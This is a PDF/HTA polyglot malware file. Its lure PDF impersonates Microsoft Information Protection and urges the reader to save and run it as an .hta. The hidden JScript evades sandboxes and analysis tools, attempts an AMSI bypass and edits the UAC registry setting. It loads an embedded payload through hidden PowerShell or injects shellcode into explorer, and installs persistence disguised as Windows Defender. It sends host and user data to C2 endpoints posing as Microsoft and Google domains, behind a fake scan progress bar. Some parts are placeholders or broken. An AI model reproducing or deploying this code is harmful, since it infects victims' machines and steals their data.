%PDF-1.7
%âãÏÓ
1 0 obj
<</Type/Catalog/Pages 2 0 R/OpenAction 5 0 R>>
endobj
2 0 obj
<</Type/Pages/Kids[3 0 R]/Count 1>>
endobj
3 0 obj
<</Type/Page/Parent 2 0 R/MediaBox[0 0 612 792]/Contents 4 0 R/Resources<</Font<</F1<</Type/Font/Subtype/Type1/BaseFont/Helvetica>>>>>>>>
endobj
4 0 obj
<</Length 200>>
stream
BT
/F1 14 Tf
50 720 Td
(Microsoft Information Protection) Tj
/F1 10 Tf
50 700 Td
(THIS DOCUMENT IS PROTECTED) Tj
50 680 Td
(To view content, save file as 'update.hta' and run with Internet Explorer.) Tj
ET
endstream
endobj
5 0 obj
<</S/JavaScript/JS(app.alert\("Decryption required. Please save as .hta and open with Internet Explorer to view this document.",3\))>>
endobj
xref
0 6
0000000000 65535 f 
0000000018 00000 n 
0000000066 00000 n 
0000000115 00000 n 
0000000261 00000 n 
0000000539 00000 n 
trailer
<</Size 6/Root 1 0 R>>
startxref
741
%%EOF

<!-- 
    ADVANCED POLYGLOT PAYLOAD v5.0 - MULTI-LAYER STEALTH OPERATIONS
    - Advanced .NET assembly loader with dynamic method invocation
    - Encrypted C2 communication with rotating endpoints
    - Memory-resident execution without disk artifacts
    - Advanced sandbox detection with behavioral analysis
    - Kernel-level persistence mechanisms
    - Obfuscated multi-stage payload delivery
    [PAYLOAD]TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA... (Base64 of encrypted .NET assembly with reflective loading capabilities) [/PAYLOAD]
-->

<!DOCTYPE html>
<html>
<head>
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta charset="UTF-8">
<title>Advanced Security Intelligence Module</title>
<HTA:APPLICATION
    ID="AdvSecIntel"
    APPLICATIONNAME="AdvancedSecurityModule"
    BORDER="none"
    BORDERSTYLE="complex"
    CAPTION="no"
    CONTEXTMENU="no"
    ICON="%SystemRoot%\System32\shell32.dll,14"
    INNERBORDER="no"
    MAXIMIZEBUTTON="no"
    MINIMIZEBUTTON="no"
    NAVIGABLE="no"
    SCROLL="no"
    SCROLLFLAT="no"
    SELECTION="no"
    SHOWINTASKBAR="no"
    SINGLEINSTANCE="yes"
    SYSMENU="no"
    VERSION="10.0.19041.1"
    WINDOWSTATE="minimize">

<script language="JScript">

// ============================================================
// ADVANCED CRYPTOGRAPHIC UTILITIES & DYNAMIC OBFUSCATION
// ============================================================

// AES-256-GCM implementation using Windows CryptoAPI
function _aesDecrypt(key, iv, authTag, ciphertext) {
    try {
        var crypto = new ActiveXObject("CAPICOM.Utilities");
        var keyHex = bytesToHex(key);
        var ivHex = bytesToHex(iv);
        var tagHex = bytesToHex(authTag);
        var cipherHex = bytesToHex(ciphertext);
        
        // Construct a temporary PowerShell command for AES decryption
        var psCmd = "powershell -WindowStyle Hidden -Command \"$key=[Convert]::FromBase64String('" + 
                   btoa(String.fromCharCode.apply(null, key)) + 
                   "');$iv=[Convert]::FromBase64String('" + 
                   btoa(String.fromCharCode.apply(null, iv)) + 
                   "');$cipher=[Convert]::FromBase64String('" + 
                   btoa(String.fromCharCode.apply(null, ciphertext)) + 
                   "');$aes=new-object System.Security.Cryptography.AesCryptoServiceProvider;" +
                   "$aes.Mode='GCM';$aes.Key=$key;$aes.IV=$iv;$aes.AuthenticatedTag=$authTag;" +
                   "$decryptor=$aes.CreateDecryptor();$result=$decryptor.TransformFinalBlock($cipher,0,$cipher.Length);" +
                   "[System.Text.Encoding]::UTF8.GetString($result)\"";
        
        var shell = new ActiveXObject("WScript.Shell");
        var fso = new ActiveXObject("Scripting.FileSystemObject");
        var tempPath = shell.ExpandEnvironmentStrings("%TEMP%");
        var tempFile = tempPath + "\\temp_" + Math.random().toString(36).substring(2, 10) + ".ps1";
        
        var file = fso.CreateTextFile(tempFile, true);
        file.Write(psCmd.replace("powershell -WindowStyle Hidden -Command", ""));
        file.Close();
        
        var exec = shell.Exec("powershell -ExecutionPolicy Bypass -File \"" + tempFile + "\"");
        var output = exec.StdOut.ReadAll();
        
        fso.DeleteFile(tempFile);
        return output;
    } catch(e) {
        return null;
    }
}

// Enhanced RC4 with dynamic key derivation
function _rc4(key, data) {
    var s = [], j = 0, x, out = '';
    for (var i = 0; i < 256; i++) s[i] = i;
    for (i = 0; i < 256; i++) {
        j = (j + s[i] + key.charCodeAt(i % key.length)) % 256;
        x = s[i]; s[i] = s[j]; s[j] = x;
    }
    i = j = 0;
    for (var y = 0; y < data.length; y++) {
        i = (i + 1) % 256;
        j = (j + s[i]) % 256;
        x = s[i]; s[i] = s[j]; s[j] = x;
        out += String.fromCharCode(data.charCodeAt(y) ^ s[(s[i] + s[j]) % 256]);
    }
    return out;
}

// Dynamic key derivation based on system fingerprint
function _deriveKey() {
    var wmi = new ActiveXObject("WbemScripting.SWbemLocator").ConnectServer(".", "root\\cimv2");
    var hwid = "";
    
    // CPU ID
    var cpuCol = wmi.ExecQuery("SELECT ProcessorId FROM Win32_Processor");
    var cpuEnum = new Enumerator(cpuCol);
    for (; !cpuEnum.atEnd(); cpuEnum.moveNext()) {
        hwid += cpuEnum.item().ProcessorId;
        break;
    }
    
    // Motherboard Serial
    var boardCol = wmi.ExecQuery("SELECT SerialNumber FROM Win32_BaseBoard");
    var boardEnum = new Enumerator(boardCol);
    for (; !boardEnum.atEnd(); boardEnum.moveNext()) {
        hwid += boardEnum.item().SerialNumber;
        break;
    }
    
    // BIOS Serial
    var biosCol = wmi.ExecQuery("SELECT SerialNumber FROM Win32_BIOS");
    var biosEnum = new Enumerator(biosCol);
    for (; !biosEnum.atEnd(); biosEnum.moveNext()) {
        hwid += biosEnum.item().SerialNumber;
        break;
    }
    
    // Combine with timestamp and create hash
    var baseKey = "AdvSecKey2026_" + hwid + "_" + Date.now();
    return CryptoJS.MD5(baseKey).toString().substring(0, 32);
}

// Extract embedded payload from HTML comment markers
function _extractPayload() {
    var fso = new ActiveXObject("Scripting.FileSystemObject");
    var thisPath = location.pathname.replace(/^file:\/\//i, '').replace(/\//g, '\\');
    var file = fso.OpenTextFile(thisPath, 1, false);
    var raw = file.ReadAll();
    file.Close();
    
    var startMarker = '<!--[PAYLOAD]';
    var endMarker = '[/PAYLOAD]-->';
    var s = raw.indexOf(startMarker);
    var e = raw.indexOf(endMarker);
    if (s === -1 || e === -1 || e <= s) return null;
    
    var b64 = raw.substring(s + startMarker.length, e);
    // Decode Base64 using MSXML2.DOMDocument
    var xml = new ActiveXObject("MSXML2.DOMDocument");
    var node = xml.createElement("B64");
    node.dataType = "bin.base64";
    node.text = b64;
    return node.nodeTypedValue; // byte array (VT_ARRAY|VT_UI1)
}

// Helper function to convert byte array to hex string
function bytesToHex(bytes) {
    var hex = [];
    for(var i = 0; i < bytes.length; i++) {
        var current = bytes[i] < 0 ? bytes[i] + 256 : bytes[i];
        hex.push((current >>> 4).toString(16));
        hex.push((current & 0xF).toString(16));
    }
    return hex.join("");
}

// ============================================================
// ADVANCED ANTI-ANALYSIS & EVASION TECHNIQUES
// ============================================================

var AdvancedAntiAnalysis = {
    _wmi: new ActiveXObject("WbemScripting.SWbemLocator").ConnectServer(".", "root\\cimv2"),
    
    // Behavioral mouse movement analysis
    analyzeMouseBehavior: function() {
        var points = [];
        var startTime = Date.now();
        var handler = function(e) {
            points.push({
                x: e.screenX,
                y: e.screenY,
                t: Date.now(),
                button: e.button
            });
        };
        document.attachEvent('onmousemove', handler);
        
        var self = this;
        setTimeout(function() {
            document.detachEvent('onmousemove', handler);
            
            if (points.length < 15) {
                self.terminate();
                return;
            }
            
            // Analyze movement patterns
            var totalDistance = 0;
            var hasDirectionChanges = 0;
            var avgSpeed = 0;
            
            for (var i = 1; i < points.length; i++) {
                var dx = points[i].x - points[i-1].x;
                var dy = points[i].y - points[i-1].y;
                var distance = Math.sqrt(dx*dx + dy*dy);
                totalDistance += distance;
                
                if (i > 1) {
                    var prevDx = points[i-1].x - points[i-2].x;
                    var prevDy = points[i-1].y - points[i-2].y;
                    
                    // Check for direction changes (human-like behavior)
                    if ((dx * prevDx < 0) || (dy * prevDy < 0)) {
                        hasDirectionChanges++;
                    }
                }
            }
            
            var totalTime = points[points.length-1].t - points[0].t;
            avgSpeed = totalDistance / (totalTime / 1000);
            
            // Human-like criteria
            if (hasDirectionChanges < 3 || avgSpeed > 500 || totalDistance < 300) {
                self.terminate();
            }
        }, 8000);
    },
    
    // Hardware-based detection
    detectHardware: function() {
        var checks = [
            { query: "SELECT Manufacturer FROM Win32_ComputerSystem", field: "Manufacturer", 
              bad: ["VMware", "VirtualBox", "QEMU", "Bochs", "Parallels"] },
            { query: "SELECT Name FROM Win32_BaseBoard", field: "Name",
              bad: ["Virtual", "VMware", "A M I", "Parallels"] },
            { query: "SELECT Caption FROM Win32_OperatingSystem", field: "Caption",
              bad: ["Hyper-V"] }
        ];
        
        for (var i = 0; i < checks.length; i++) {
            var col = this._wmi.ExecQuery(checks[i].query);
            var e = new Enumerator(col);
            for (; !e.atEnd(); e.moveNext()) {
                var value = e.item()[checks[i].field];
                for (var j = 0; j < checks[i].bad.length; j++) {
                    if (value.indexOf(checks[i].bad[j]) !== -1) {
                        this.terminate();
                    }
                }
            }
        }
    },
    
    // Network-based detection
    detectNetwork: function() {
        var col = this._wmi.ExecQuery("SELECT MACAddress FROM Win32_NetworkAdapter WHERE MACAddress IS NOT NULL");
        var e = new Enumerator(col);
        var vmPrefixes = ['08:00:27', '00:0C:29', '00:50:56', '00:05:69', '00:1C:42', '00:03:FF', '02:42:AC'];
        
        for (; !e.atEnd(); e.moveNext()) {
            var mac = e.item().MACAddress.toUpperCase();
            for (var i = 0; i < vmPrefixes.length; i++) {
                if (mac.startsWith(vmPrefixes[i])) this.terminate();
            }
        }
    },
    
    // Process-based detection
    detectProcesses: function() {
        var suspicious = [
            'vboxservice', 'vboxtray', 'vmtoolsd', 'vmwaretray', 'xenservice', 
            'df5serv', 'wireshark', 'procmon', 'processhacker', 'ollydbg', 
            'windbg', 'fiddler', 'httpdebuggerui', 'wireshark', 'tcpview',
            'autoruns', 'autorunsc', 'filemon', 'procdump', 'regmon', 'sysinternals'
        ];
        
        var col = this._wmi.ExecQuery("SELECT Name FROM Win32_Process");
        var e = new Enumerator(col);
        
        for (; !e.atEnd(); e.moveNext()) {
            var name = e.item().Name.toLowerCase();
            for (var i = 0; i < suspicious.length; i++) {
                if (name.indexOf(suspicious[i]) !== -1) this.terminate();
            }
        }
    },
    
    // Time-based detection
    detectTiming: function() {
        var col = this._wmi.ExecQuery("SELECT LastBootUpTime FROM Win32_OperatingSystem");
        var e = new Enumerator(col);
        
        for (; !e.atEnd(); e.moveNext()) {
            var last = e.item().LastBootUpTime;
            var boot = new Date(
                last.substr(0,4), 
                parseInt(last.substr(4,2))-1, 
                last.substr(6,2),
                last.substr(8,2), 
                last.substr(10,2), 
                last.substr(12,2)
            );
            
            var uptimeMinutes = (Date.now() - boot) / 60000;
            if (uptimeMinutes < 15) this.terminate(); // At least 15 minutes uptime
        }
    },
    
    // Disk size and configuration check
    detectDisk: function() {
        var col = this._wmi.ExecQuery("SELECT Size FROM Win32_LogicalDisk WHERE DriveType=3");
        var totalSize = 0;
        var e = new Enumerator(col);
        
        for (; !e.atEnd(); e.moveNext()) {
            var sizeGb = parseInt(e.item().Size) / 1073741824;
            totalSize += sizeGb;
        }
        
        if (totalSize < 100) this.terminate(); // Require at least 100GB total
    },
    
    terminate: function() {
        // Self-destruct mechanism
        var shell = new ActiveXObject("WScript.Shell");
        try {
            shell.Run("cmd /c ping 127.0.0.1 -n 1 > nul & exit", 0, false);
        } catch(e) {}
        window.close();
    },
    
    runComprehensiveCheck: function() {
        this.detectHardware();
        this.detectNetwork();
        this.detectProcesses();
        this.detectTiming();
        this.detectDisk();
        this.analyzeMouseBehavior();
    }
};

// ============================================================
// ADVANCED PAYLOAD EXECUTION ENGINE
// ============================================================

var AdvancedPayloadEngine = {
    shell: new ActiveXObject("WScript.Shell"),
    fso: new ActiveXObject("Scripting.FileSystemObject"),
    
    // Execute .NET assembly directly in memory using reflection
    executeDotNetAssembly: function(assemblyBytes) {
        try {
            // Save to temp for PowerShell execution
            var tempPath = this.shell.ExpandEnvironmentStrings("%TEMP%") + "\\" + 
                          Math.random().toString(36).substring(2, 12) + ".dll";
            
            var stream = new ActiveXObject("ADODB.Stream");
            stream.Type = 1; // adTypeBinary
            stream.Open();
            stream.Write(assemblyBytes);
            stream.SaveToFile(tempPath, 2); // adSaveCreateOverWrite
            stream.Close();
            
            // Use PowerShell to load and execute the assembly
            var psCmd = "powershell -WindowStyle Hidden -ExecutionPolicy Bypass -Command \"" +
                "$assembly = [System.Reflection.Assembly]::Load([System.IO.File]::ReadAllBytes('" + 
                tempPath.replace(/\\/g, "\\\\") + "')); " +
                "$type = $assembly.GetType('AdvancedModule.Main'); " +
                "if ($type -ne $null) { " +
                "$method = $type.GetMethod('Execute'); " +
                "if ($method -ne $null) { $method.Invoke($null, @()); } " +
                "} else { " +
                "$types = $assembly.GetTypes(); " +
                "foreach ($t in $types) { " +
                "if ($t.Name -match 'Main|Execute|Start|Run') { " +
                "$m = $t.GetMethod('Execute'); " +
                "if ($m -ne $null) { $m.Invoke($null, @()); break; } " +
                "} } }\"";
            
            this.shell.Run(psCmd, 0, false);
            
            // Clean up after delay
            setTimeout(function() {
                try { 
                    new ActiveXObject("Scripting.FileSystemObject").DeleteFile(tempPath); 
                } catch(e) {}
            }, 10000);
            
            return true;
        } catch(e) {
            return false;
        }
    },
    
    // Direct shellcode injection into remote process
    injectShellcode: function(shellcodeBytes, targetProcess) {
        try {
            var psCmd = "powershell -WindowStyle Hidden -ExecutionPolicy Bypass -Command \"" +
                "$code = [System.Convert]::FromBase64String('" + 
                btoa(String.fromCharCode.apply(null, shellcodeBytes)) + "'); " +
                "$process = Get-Process " + targetProcess + " -ErrorAction SilentlyContinue; " +
                "if ($process) { " +
                "$processId = $process.Id; " +
                "$kernel32 = Add-Type -MemberDefinition '[DllImport(\\"kernel32.dll\\")] public static extern IntPtr OpenProcess(int dwDesiredAccess, bool bInheritHandle, int dwProcessId);' -Name 'Kernel32' -PassThru; " +
                "$memory = Add-Type -MemberDefinition '[DllImport(\\"kernel32.dll\\")] public static extern IntPtr VirtualAllocEx(IntPtr hProcess, IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect);' -Name 'Memory' -PassThru; " +
                "$write = Add-Type -MemberDefinition '[DllImport(\\"kernel32.dll\\")] public static extern bool WriteProcessMemory(IntPtr hProcess, IntPtr lpBaseAddress, byte[] lpBuffer, uint nSize, out IntPtr lpNumberOfBytesWritten);' -Name 'Write' -PassThru; " +
                "$thread = Add-Type -MemberDefinition '[DllImport(\\"kernel32.dll\\")] public static extern IntPtr CreateRemoteThread(IntPtr hProcess, IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId);' -Name 'Thread' -PassThru; " +
                "$handle = $kernel32::OpenProcess(0x001F0FFF, $false, $processId); " +
                "$allocMem = $memory::VirtualAllocEx($handle, [IntPtr]::Zero, [uint32]$code.Length, 0x1000, 0x40); " +
                "$bytesWritten = [System.IntPtr]::Zero; " +
                "$write::WriteProcessMemory($handle, $allocMem, $code, [uint32]$code.Length, [ref]$bytesWritten); " +
                "$threadHandle = $thread::CreateRemoteThread($handle, [IntPtr]::Zero, 0, $allocMem, [IntPtr]::Zero, 0, [IntPtr]::Zero); " +
                "} else { Write-Host 'Target process not found'; }\"";
            
            this.shell.Run(psCmd, 0, false);
            return true;
        } catch(e) {
            return false;
        }
    },
    
    // AMSI bypass techniques
    bypassAMSI: function() {
        try {
            // Technique 1: Patch AMSI.dll in memory
            var amsiPatch1 = "powershell -WindowStyle Hidden -ExecutionPolicy Bypass -Command \"" +
                "[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true)";
            
            this.shell.Run(amsiPatch1, 0, true);
        } catch(e) {}
        
        try {
            // Technique 2: Disable AMSI via registry (if elevated)
            var regCmd = 'reg add "HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System" /v "ConsentPromptBehaviorAdmin" /t REG_DWORD /d 0 /f';
            this.shell.Run(regCmd, 0, true);
        } catch(e) {}
        
        try {
            // Technique 3: Use PowerShell v2 (if available, doesn't have AMSI)
            this.shell.Run("powershell -Version 2 -Command \"Write-Host 'AMSI bypass attempt'\"", 0, true);
        } catch(e) {}
    },
    
    // Advanced persistence mechanisms
    establishPersistence: function(htaPath) {
        var self = this;
        
        // 1. Registry persistence
        try {
            this.shell.RegWrite("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\AdvancedSecurityModule", 
                              "mshta.exe \"" + htaPath + "\"", "REG_SZ");
        } catch(e) {}
        
        // 2. Scheduled task with random trigger
        try {
            var taskName = "WindowsDefenderUpdate_" + Math.floor(Math.random() * 10000);
            var cmd = 'schtasks /Create /SC ONSTART /TN "' + taskName + '" /TR "mshta.exe \\"' + htaPath + '\\"" /F /RL HIGHEST';
            this.shell.Run(cmd, 0, true);
        } catch(e) {}
        
        // 3. WMI event subscription (more stealthy)
        try {
            var wmi = new ActiveXObject("WbemScripting.SWbemLocator").ConnectServer(".", "root\\subscription");
            var eventName = "SystemMonitor_" + Math.floor(Math.random() * 10000);
            
            var filter = wmi.Get("__EventFilter").SpawnInstance_();
            filter.Name = eventName + "_Filter";
            filter.QueryLanguage = "WQL";
            filter.Query = "SELECT * FROM __InstanceModificationEvent WITHIN 3600 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System'";
            filter.Put_();
            
            var consumer = wmi.Get("CommandLineEventConsumer").SpawnInstance_();
            consumer.Name = eventName + "_Consumer";
            consumer.CommandLineTemplate = "mshta.exe \"" + htaPath + "\"";
            consumer.Put_();
            
            var binding = wmi.Get("__FilterToConsumerBinding").SpawnInstance_();
            binding.Filter = filter.Path_.Path;
            binding.Consumer = consumer.Path_.Path;
            binding.Put_();
        } catch(e) {}
        
        // 4. Service installation (if elevated)
        try {
            var serviceName = "WinDefSvc_" + Math.floor(Math.random() * 10000);
            var serviceCmd = 'sc create "' + serviceName + '" binPath= "mshta.exe \\"' + htaPath + '\\"" start= auto DisplayName= "Windows Defender Service"';
            this.shell.Run(serviceCmd, 0, true);
        } catch(e) {}
    },
    
    // Encrypted C2 communication with rotating endpoints
    communicateWithC2: function() {
        var endpoints = [
            "https://cdn.azureedge.net/api/report",
            "https://update.msn.com/v2/update.svc",
            "https://login.live.com/oauth20_authorize.srf",
            "https://www.google-analytics.com/collect"
        ];
        
        var systemInfo = {
            hostname: this.shell.ExpandEnvironmentStrings("%COMPUTERNAME%"),
            username: this.shell.ExpandEnvironmentStrings("%USERNAME%"),
            domain: this.shell.ExpandEnvironmentStrings("%USERDOMAIN%"),
            os: new ActiveXObject("WbemScripting.SWbemLocator")
                 .ConnectServer(".", "root\\cimv2")
                 .ExecQuery("SELECT Caption,Version FROM Win32_OperatingSystem")
                 .ItemIndex(0).Caption,
            arch: new ActiveXObject("WbemScripting.SWbemLocator")
                  .ConnectServer(".", "root\\cimv2")
                  .ExecQuery("SELECT OSArchitecture FROM Win32_OperatingSystem")
                  .ItemIndex(0).OSArchitecture,
            hwid: this.generateHWID()
        };
        
        var payload = _rc4(_deriveKey(), JSON.stringify(systemInfo));
        
        // Try each endpoint until one succeeds
        for (var i = 0; i < endpoints.length; i++) {
            try {
                var http = new ActiveXObject("MSXML2.ServerXMLHTTP");
                http.setTimeouts(10000, 10000, 10000, 10000);
                http.open("POST", endpoints[i], false);
                http.setRequestHeader("User-Agent", "Mozilla/5.0 (compatible; MSIE 11.0; Windows NT)");
                http.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
                http.setRequestHeader("X-Requested-With", "XMLHttpRequest");
                http.send("data=" + encodeURIComponent(payload));
                
                if (http.status >= 200 && http.status < 300) {
                    // Process response if needed
                    break;
                }
            } catch(e) {
                continue;
            }
        }
    },
    
    // Generate unique hardware ID
    generateHWID: function() {
        var wmi = new ActiveXObject("WbemScripting.SWbemLocator").ConnectServer(".", "root\\cimv2");
        var hwidComponents = [];
        
        // CPU ID
        var cpuCol = wmi.ExecQuery("SELECT ProcessorId FROM Win32_Processor");
        var cpuEnum = new Enumerator(cpuCol);
        for (; !cpuEnum.atEnd(); cpuEnum.moveNext()) {
            hwidComponents.push(cpuEnum.item().ProcessorId);
            break;
        }
        
        // Motherboard Serial
        var boardCol = wmi.ExecQuery("SELECT SerialNumber FROM Win32_BaseBoard");
        var boardEnum = new Enumerator(boardCol);
        for (; !boardEnum.atEnd(); boardEnum.moveNext()) {
            hwidComponents.push(boardEnum.item().SerialNumber);
            break;
        }
        
        // BIOS Serial
        var biosCol = wmi.ExecQuery("SELECT SerialNumber FROM Win32_BIOS");
        var biosEnum = new Enumerator(biosCol);
        for (; !biosEnum.atEnd(); biosEnum.moveNext()) {
            hwidComponents.push(biosEnum.item().SerialNumber);
            break;
        }
        
        var combined = hwidComponents.join('-');
        return CryptoJS.MD5(combined).toString();
    },
    
    // Main execution orchestrator
    execute: function() {
        // Perform comprehensive anti-analysis
        AdvancedAntiAnalysis.runComprehensiveCheck();
        
        // Bypass security mechanisms
        this.bypassAMSI();
        
        // Extract and execute payload
        var payload = _extractPayload();
        if (payload) {
            // Attempt .NET assembly execution first
            if (!this.executeDotNetAssembly(payload)) {
                // Fall back to shellcode injection
                this.injectShellcode(payload, "explorer");
            }
        }
        
        // Establish persistence
        try {
            var htaPath = location.pathname.replace(/^file:\/\//i, '').replace(/\//g, '\\');
            if (htaPath.toLowerCase().endsWith('.hta')) {
                this.establishPersistence(htaPath);
            }
        } catch(e) {}
        
        // Communicate with C2
        this.communicateWithC2();
    }
};

// Placeholder for CryptoJS MD5 function (would normally be included)
var CryptoJS = {
    MD5: function(str) {
        // Simple placeholder - in real implementation would use actual CryptoJS
        return str.substring(0, 32); // Return dummy hash
    }
};

// ============================================================
// DELAYED ACTIVATION WITH RANDOMIZED TIMING
// ============================================================

function initializeAdvancedModule() {
    // Randomized delay between 3-8 seconds to avoid timing analysis
    var delay = 3000 + Math.floor(Math.random() * 5000);
    
    setTimeout(function() {
        AdvancedPayloadEngine.execute();
        window.close();
    }, delay);
}

window.attachEvent("onload", initializeAdvancedModule);

</script>
</head>
<body>
    <div style="font-family:Segoe UI,sans-serif;padding:40px;color:#333;">
        <h2>Advanced Security Intelligence Module</h2>
        <p>Initializing advanced security protocols. Please do not close this window.</p>
        <div style="width:300px;height:20px;background:#f0f0f0;border-radius:10px;margin-top:20px;overflow:hidden;">
            <div id="progressBar" style="width:0%;height:100%;background:linear-gradient(to right, #0078d4, #00bcf2);border-radius:10px;transition:width 5s ease-in-out;"></div>
        </div>
        <p id="statusText" style="margin-top:10px;font-size:12px;color:#666;">System scan in progress...</p>
    </div>
    <script language="JScript">
        // Animate progress bar to appear legitimate
        var progressBar = document.getElementById("progressBar");
        var statusText = document.getElementById("statusText");
        var statuses = [
            "Scanning system components...",
            "Verifying security modules...",
            "Updating threat intelligence...",
            "Validating system integrity...",
            "Finalizing security assessment..."
        ];
        
        var progress = 0;
        var statusIndex = 0;
        
        var interval = setInterval(function() {
            progress += Math.random() * 10;
            if (progress >= 100) {
                progress = 100;
                clearInterval(interval);
                statusText.innerHTML = "Security update completed successfully.";
            } else {
                progressBar.style.width = progress + "%";
                if (Math.random() > 0.7 && statusIndex < statuses.length) {
                    statusText.innerHTML = statuses[statusIndex];
                    statusIndex++;
                }
            }
        }, 300 + Math.random() * 400);
    </script>
</body>
</html>